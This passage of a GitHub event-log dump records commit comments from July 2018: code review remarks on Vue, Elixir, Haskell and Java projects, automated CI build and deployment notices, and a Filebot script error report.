2018-07-23T18:35:55.565Z\n\n</details>"}},"created_at":"2018-07-23T18:35:55Z"}
{"id":"8005685618","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29804206,"position":null,"line":null,"path":null,"commit_id":"a1cf4e7574f66e1880f4bec488770e5547413197","created_at":"2018-07-23T18:36:17Z","updated_at":"2018-07-23T18:36:17Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-23T18:36:17Z"}
{"id":"8005689704","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29804214,"position":7,"line":52,"path":"code/drasil-lang/Language/Drasil/Symbol.hs","commit_id":"5b6504a5003833114ff055fc4bfe4f00aba798f7","created_at":"2018-07-23T18:37:06Z","updated_at":"2018-07-23T18:37:06Z","author_association":"OWNER","body":"doesn't `toLower` make things case **insensitive** ?"}},"created_at":"2018-07-23T18:37:06Z"}
{"id":"8005691981","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29804217,"position":null,"line":null,"path":null,"commit_id":"ce6ccf1e29f0ce896512a5cf4056fe06f6345589","created_at":"2018-07-23T18:37:32Z","updated_at":"2018-07-23T18:37:32Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-23T18:37:32Z"}
{"id":"8005697326","type":"CommitCommentEvent","actor":{"login":"dashersw"},"repo":{"name":"merveer/flight-check-in"},"payload":{"comment":{"id":29804227,"position":12,"line":23,"path":"checkin/src/App.vue","commit_id":"f6a18569f457787528302b7e1f4e771b88301eeb","created_at":"2018-07-23T18:38:35Z","updated_at":"2018-07-23T18:38:35Z","author_association":"NONE","body":"bu style tag'inin scoped olmasi gerek."}},"created_at":"2018-07-23T18:38:35Z"}
{"id":"8005698434","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29804229,"position":null,"line":null,"path":null,"commit_id":"b743c93a2505b2b6701159344167851ea1b8b857","created_at":"2018-07-23T18:38:48Z","updated_at":"2018-07-23T18:38:48Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-23T18:38:48Z"}
{"id":"8005704324","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29804245,"position":null,"line":null,"path":null,"commit_id":"a28f341c2ef3441af8a6b63e4e08fdb4890fc544","created_at":"2018-07-23T18:40:01Z","updated_at":"2018-07-23T18:40:01Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-23T18:40:01Z"}
{"id":"8005705556","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29804249,"position":null,"line":null,"path":null,"commit_id":"09e5a53bd6f1840e14edd4d6401cfc8de7560842","created_at":"2018-07-23T18:40:17Z","updated_at":"2018-07-23T18:40:17Z","author_association":"OWNER","body":"Created multidev environment [dgreat#ci-955](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#ci-955).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-955-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-23T18:40:17Z"}
{"id":"8005709294","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29804256,"position":null,"line":null,"path":null,"commit_id":"aa2b41023cab83e14ad9f61b13d09bde57e2cea4","created_at":"2018-07-23T18:41:02Z","updated_at":"2018-07-23T18:41:02Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-23T18:41:02Z"}
{"id":"8005710403","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29804262,"position":null,"line":null,"path":null,"commit_id":"30c2c454c36a33ca351d9f717a29210b25671bd4","created_at":"2018-07-23T18:41:15Z","updated_at":"2018-07-23T18:41:15Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-23T18:41:15Z"}
{"id":"8005710742","type":"CommitCommentEvent","actor":{"login":"dashersw"},"repo":{"name":"merveer/flight-check-in"},"payload":{"comment":{"id":29804263,"position":72,"line":78,"path":"checkin/src/components/checkin.vue","commit_id":"5ca5761ae406f17308c49c286902b03ee7992669","created_at":"2018-07-23T18:41:19Z","updated_at":"2018-07-23T18:41:19Z","author_association":"NONE","body":"no need for `'`'s."}},"created_at":"2018-07-23T18:41:19Z"}
{"id":"8005716406","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29804273,"position":null,"line":null,"path":null,"commit_id":"d846bee7b995a60038d1ab284be4b15525c7a5fa","created_at":"2018-07-23T18:42:27Z","updated_at":"2018-07-23T18:42:27Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-23T18:42:27Z"}
{"id":"8005716644","type":"CommitCommentEvent","actor":{"login":"dashersw"},"repo":{"name":"merveer/flight-check-in"},"payload":{"comment":{"id":29804274,"position":47,"line":56,"path":"checkin/src/components/checkin.vue","commit_id":"5ca5761ae406f17308c49c286902b03ee7992669","created_at":"2018-07-23T18:42:30Z","updated_at":"2018-07-23T18:42:30Z","author_association":"NONE","body":"use camelCase as in `selectedSeat`"}},"created_at":"2018-07-23T18:42:30Z"}
{"id":"8005719237","type":"CommitCommentEvent","actor":{"login":"dashersw"},"repo":{"name":"merveer/flight-check-in"},"payload":{"comment":{"id":29804284,"position":16,"line":21,"path":"checkin/src/components/checkin.vue","commit_id":"5ca5761ae406f17308c49c286902b03ee7992669","created_at":"2018-07-23T18:43:05Z","updated_at":"2018-07-23T18:43:05Z","author_association":"NONE","body":"instead of `n in 20`, you should use `seat in seats`."}},"created_at":"2018-07-23T18:43:05Z"}
{"id":"8005719877","type":"CommitCommentEvent","actor":{"login":"dashersw"},"repo":{"name":"merveer/flight-check-in"},"payload":{"comment":{"id":29804288,"position":16,"line":21,"path":"checkin/src/components/checkin.vue","commit_id":"5ca5761ae406f17308c49c286902b03ee7992669","created_at":"2018-07-23T18:43:12Z","updated_at":"2018-07-23T18:43:12Z","author_association":"NONE","body":"refactor for this."}},"created_at":"2018-07-23T18:43:12Z"}
{"id":"8005722175","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29804294,"position":null,"line":null,"path":null,"commit_id":"a1cf4e7574f66e1880f4bec488770e5547413197","created_at":"2018-07-23T18:43:39Z","updated_at":"2018-07-23T18:43:39Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-23T18:43:39Z"}
{"id":"8005728491","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29804308,"position":null,"line":null,"path":null,"commit_id":"91de98cd62e6756a2b574fec0f19d28d56cd71d5","created_at":"2018-07-23T18:44:53Z","updated_at":"2018-07-23T18:44:53Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-23T18:44:53Z"}
{"id":"8005728558","type":"CommitCommentEvent","actor":{"login":"josevalim"},"repo":{"name":"elixir-lang/elixir"},"payload":{"comment":{"id":29804309,"position":4,"line":55,"path":"lib/elixir/src/elixir_env.erl","commit_id":"093439b82c23cb22bc781b7977aa3e7800c92f9c","created_at":"2018-07-23T18:44:53Z","updated_at":"2018-07-23T18:44:53Z","author_association":"MEMBER","body":"```erlang\r\n%% Unrolled the clauses for performance reasons\r\nmergev(#{vars := V1, unused_vars := U1, current_vars := C1},\r\n       #{vars := V2, unused_vars := U2, current_vars := C2} = E2) ->\r\n  if\r\n    C1 /= C2 ->\r\n      if\r\n        U1 /= U2 ->\r\n          E2#{\r\n            vars := ordsets:union(V1, V2),\r\n            unused_vars := merge_vars(U1, U2),\r\n            current_vars := merge_vars(C1, C2)\r\n          };\r\n        true ->\r\n          E2#{vars := ordsets:union(V1, V2), current_vars := merge_vars(C1, C2)}\r\n      end;\r\n\r\n    U1 /= U2 ->\r\n      E2#{unused_vars := merge_vars(U1, U2)};\r\n\r\n    true ->\r\n      E2\r\n  end.\r\n```\r\n\r\nThen we can remove the check from `merge_vars`.\r\n\r\nNotice similar optimizations should be done in elixir_erl_var."}},"created_at":"2018-07-23T18:44:53Z"}
{"id":"8005731265","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29804318,"position":null,"line":null,"path":null,"commit_id":"85774f230b3d28f6b306e8e0a279a95af6cb82de","created_at":"2018-07-23T18:45:25Z","updated_at":"2018-07-23T18:45:25Z","author_association":"NONE","body":"159149473-Bug-in-surface-dot/cross-product-calculation-#6834 (lgu1234) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2984 of 2984 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-85774f230b3d28f6b306e8e0a279a95af6cb82de-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-85774f230b3d28f6b306e8e0a279a95af6cb82de-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-23T18:45:25Z"}
{"id":"8005731356","type":"CommitCommentEvent","actor":{"login":"dashersw"},"repo":{"name":"merveer/flight-check-in"},"payload":{"comment":{"id":29804321,"position":127,"line":124,"path":"checkin/src/components/checkin.vue","commit_id":"5ca5761ae406f17308c49c286902b03ee7992669","created_at":"2018-07-23T18:45:25Z","updated_at":"2018-07-23T18:45:25Z","author_association":"NONE","body":"you can only use axios in the store."}},"created_at":"2018-07-23T18:45:25Z"}
{"id":"8005733418","type":"CommitCommentEvent","actor":{"login":"kaste"},"repo":{"name":"SublimeLinter/SublimeLinter-phpcs"},"payload":{"comment":{"id":29804324,"position":null,"line":null,"path":null,"commit_id":"e817cd4935345e25170e3dd45acc5ff4b03cc6fb","created_at":"2018-07-23T18:45:50Z","updated_at":"2018-07-23T18:45:50Z","author_association":"CONTRIBUTOR","body":"Either you break for all users or just a subset. Here you break for all.\r\n\r\nNote that if you set the default to None, you can still encourage people to not use the setting anymore but args.\r\n\r\nThe messages are mostly noise bc they popup on update, not necessarily when you use the plugin. \r\n\r\nProper deprecation is look up if the user set standard and popup an error message. We already have code to do this, so it's relatively cheap to code."}},"created_at":"2018-07-23T18:45:50Z"}
{"id":"8005733506","type":"CommitCommentEvent","actor":{"login":"dashersw"},"repo":{"name":"merveer/flight-check-in"},"payload":{"comment":{"id":29804325,"position":140,"line":138,"path":"checkin/src/components/checkin.vue","commit_id":"5ca5761ae406f17308c49c286902b03ee7992669","created_at":"2018-07-23T18:45:51Z","updated_at":"2018-07-23T18:45:51Z","author_association":"NONE","body":"you can't change the state in the component. that's what Vuex is for. this should live in the store."}},"created_at":"2018-07-23T18:45:51Z"}
{"id":"8005734594","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29804328,"position":null,"line":null,"path":null,"commit_id":"c6d06d8d0f59b201a6f7c792af17763a724a9816","created_at":"2018-07-23T18:46:05Z","updated_at":"2018-07-23T18:46:05Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-23T18:46:05Z"}
{"id":"8005737054","type":"CommitCommentEvent","actor":{"login":"jincougar"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29804333,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-23T18:46:34Z","updated_at":"2018-07-23T18:46:34Z","author_association":"NONE","body":"good project\r\n"}},"created_at":"2018-07-23T18:46:34Z"}
{"id":"8005738076","type":"CommitCommentEvent","actor":{"login":"josevalim"},"repo":{"name":"elixir-lang/elixir"},"payload":{"comment":{"id":29804338,"position":4,"line":55,"path":"lib/elixir/src/elixir_env.erl","commit_id":"093439b82c23cb22bc781b7977aa3e7800c92f9c","created_at":"2018-07-23T18:46:47Z","updated_at":"2018-07-23T18:46:47Z","author_association":"MEMBER","body":"Notice the above also has the benefit of associating `unused_vars` and `current_vars`, which means we compute the slow one only if we have to."}},"created_at":"2018-07-23T18:46:47Z"}
{"id":"8005742990","type":"CommitCommentEvent","actor":{"login":"dotlambda"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29804352,"position":null,"line":null,"path":null,"commit_id":"f4e179eddda4f57f89e36968e4e12c69d2c5e2b1","created_at":"2018-07-23T18:47:45Z","updated_at":"2018-07-23T18:47:45Z","author_association":"MEMBER","body":"@FRidh Seems like it is still broken: https://hydra.nixos.org/build/78143551/nixlog/1."}},"created_at":"2018-07-23T18:47:45Z"}
{"id":"8005743585","type":"CommitCommentEvent","actor":{"login":"yujhongmicrosoft"},"repo":{"name":"yujhongmicrosoft/vscode-azure-account"},"payload":{"comment":{"id":29804358,"position":null,"line":null,"path":null,"commit_id":"69ad9022b3d74ee8bd5a99bd4f6d124615eb3786","created_at":"2018-07-23T18:47:52Z","updated_at":"2018-07-23T18:47:52Z","author_association":"OWNER","body":"Added login support for sovereigns"}},"created_at":"2018-07-23T18:47:52Z"}
{"id":"8005748061","type":"CommitCommentEvent","actor":{"login":"maruel"},"repo":{"name":"google/periph"},"payload":{"comment":{"id":29804371,"position":null,"line":null,"path":null,"commit_id":"efe6fe1a0a43d65b02129dfede1a25f045f98477","created_at":"2018-07-23T18:48:45Z","updated_at":"2018-07-23T18:48:45Z","author_association":"MEMBER","body":"@svenschwermer would this work? I can't test.\r\n\r\nI like this because it just make it work everywhere, with no API change and not requiring people to think about it."}},"created_at":"2018-07-23T18:48:45Z"}
{"id":"8005748773","type":"CommitCommentEvent","actor":{"login":"nicothin"},"repo":{"name":"nicothin/test-console"},"payload":{"comment":{"id":29804375,"position":6,"line":12,"path":"css/style.css","commit_id":"0d9ff8d97b06f211f4e07da42c2bd51a0af015f7","created_at":"2018-07-23T18:48:53Z","updated_at":"2018-07-23T18:48:53Z","author_association":"OWNER","body":"эти стили  — норм"}},"created_at":"2018-07-23T18:48:53Z"}
{"id":"8005750304","type":"CommitCommentEvent","actor":{"login":"cha70v"},"repo":{"name":"cha70v/test-console"},"payload":{"comment":{"id":29804377,"position":4,"line":8,"path":"index.html","commit_id":"a8e389067b643083065d76ecede577e3af799631","created_at":"2018-07-23T18:49:11Z","updated_at":"2018-07-23T18:49:11Z","author_association":"OWNER","body":"шо это"}},"created_at":"2018-07-23T18:49:11Z"}
{"id":"8005754843","type":"CommitCommentEvent","actor":{"login":"josevalim"},"repo":{"name":"elixir-lang/elixir"},"payload":{"comment":{"id":29804388,"position":4,"line":55,"path":"lib/elixir/src/elixir_env.erl","commit_id":"093439b82c23cb22bc781b7977aa3e7800c92f9c","created_at":"2018-07-23T18:50:04Z","updated_at":"2018-07-23T18:50:04Z","author_association":"MEMBER","body":"Similar optimization could be done for `mergea`? Where we check `unused_vars` and `current_vars`?"}},"created_at":"2018-07-23T18:50:04Z"}
{"id":"8005763568","type":"CommitCommentEvent","actor":{"login":"eb04"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29804405,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-23T18:51:44Z","updated_at":"2018-07-23T18:51:44Z","author_association":"NONE","body":"nice"}},"created_at":"2018-07-23T18:51:44Z"}
{"id":"8005771554","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29804426,"position":null,"line":null,"path":null,"commit_id":"8c970f0d98ecb6d0658c092419bebebb79092281","created_at":"2018-07-23T18:53:21Z","updated_at":"2018-07-23T18:53:21Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-263](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-263).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-263-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-23T18:53:21Z"}
{"id":"8005774443","type":"CommitCommentEvent","actor":{"login":"blackrock81"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29804439,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-23T18:53:56Z","updated_at":"2018-07-23T18:53:56Z","author_association":"NONE","body":"thanks good project"}},"created_at":"2018-07-23T18:53:56Z"}
{"id":"8005775053","type":"CommitCommentEvent","actor":{"login":"anb0037"},"repo":{"name":"jussaw/comp4320_project2"},"payload":{"comment":{"id":29804441,"position":5,"line":5,"path":"client/SelectiveRepeatImpl.java","commit_id":"ddc9503aeaa3a29371fd4033661da91b14cb36cf","created_at":"2018-07-23T18:54:04Z","updated_at":"2018-07-23T18:54:04Z","author_association":"COLLABORATOR","body":"i believe this data type should be DatagramSocket, i think that's why you have all the calls below commented out. Also, wouldn't it be the senderSocket since this is the server side?"}},"created_at":"2018-07-23T18:54:04Z"}
{"id":"8005782018","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29804454,"position":null,"line":null,"path":null,"commit_id":"5719d7d84b888f988f1fd70e30ee5d24baa0d580","created_at":"2018-07-23T18:55:28Z","updated_at":"2018-07-23T18:55:28Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-search](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-search).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-search-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-23T18:55:28Z"}
{"id":"8005792037","type":"CommitCommentEvent","actor":{"login":"cmkumar87"},"repo":{"name":"WING-NUS/nus-mooc-corpus"},"payload":{"comment":{"id":29804474,"position":null,"line":null,"path":null,"commit_id":"29fa074fe0318059a94c492183198d09a8073746","created_at":"2018-07-23T18:57:25Z","updated_at":"2018-07-23T18:57:25Z","author_association":"MEMBER","body":"@knmnyn just adding for your information / notice. "}},"created_at":"2018-07-23T18:57:25Z"}
{"id":"8005792101","type":"CommitCommentEvent","actor":{"login":"samm82"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29804475,"position":null,"line":null,"path":null,"commit_id":"086536e71a5fcc561d31a27a8e8bca81d21afdfb","created_at":"2018-07-23T18:57:26Z","updated_at":"2018-07-23T18:57:26Z","author_association":"COLLABORATOR","body":"There are similar functions to `makeList`, but their separators are set firmly within the function (usually commas). Would you like me to merge them?"}},"created_at":"2018-07-23T18:57:26Z"}
{"id":"8005792796","type":"CommitCommentEvent","actor":{"login":"ADF-Repositry"},"repo":{"name":"ADF-Repositry/TestGit"},"payload":{"comment":{"id":29804477,"position":null,"line":null,"path":null,"commit_id":"dfef4412da95c187ba77d48388b14bffa195cbe0","created_at":"2018-07-23T18:57:35Z","updated_at":"2018-07-23T18:57:35Z","author_association":"OWNER","body":"initial commit"}},"created_at":"2018-07-23T18:57:35Z"}
{"id":"8005793871","type":"CommitCommentEvent","actor":{"login":"rolszewo"},"repo":{"name":"garagenclown/hello-world"},"payload":{"comment":{"id":29804480,"position":null,"line":null,"path":null,"commit_id":"5586daf88868b8974c38338583eb4f585e5318de","created_at":"2018-07-23T18:57:48Z","updated_at":"2018-07-23T18:57:48Z","author_association":"NONE","body":"um 1 Jahr vertan - oder?"}},"created_at":"2018-07-23T18:57:48Z"}
{"id":"8005794183","type":"CommitCommentEvent","actor":{"login":"jsumnerPhD"},"repo":{"name":"SALTISES4/dalite-ng"},"payload":{"comment":{"id":29804481,"position":null,"line":null,"path":null,"commit_id":"42645e40d65eeaf1b7048d91f1cb422344273073","created_at":"2018-07-23T18:57:51Z","updated_at":"2018-07-23T18:57:51Z","author_association":"MEMBER","body":"FYI - project coverage: 78%"}},"created_at":"2018-07-23T18:57:51Z"}
{"id":"8005796290","type":"CommitCommentEvent","actor":{"login":"hmemcpy"},"repo":{"name":"filebot/scripts"},"payload":{"comment":{"id":29804483,"position":5,"line":14,"path":"amc.groovy","commit_id":"0479eda071a4eaa69440dea73670d7dafef2e085","created_at":"2018-07-23T18:58:16Z","updated_at":"2018-07-23T18:58:16Z","author_association":"NONE","body":"I seem to get the error:\r\nHello all! I just noticed my deluge weren't being unpacked automatically, so I ssh'd into the box and tried running filebot manually... I keep getting \r\n```\r\nNo such property: license for class: Script1\r\ngroovy.lang.MissingPropertyException: No such property: license for class: Script1\r\n        at Script1.run(Script1.groovy:14)\r\n        at net.filebot.cli.ScriptShell.evaluate(ScriptShell.java:64)\r\n        at net.filebot.cli.ScriptShell.runScript(ScriptShell.java:74)\r\n        at net.filebot.cli.ArgumentProcessor.runScript(ArgumentProcessor.java:122)\r\n        at net.filebot.cli.ArgumentProcessor.run(ArgumentProcessor.java:29)\r\n        at net.filebot.Main.main(Main.java:115)\r\n```\r\nsince this change was added. Should this property be defined somewhere?"}},"created_at":"2018-07-23T18:58:16Z"}
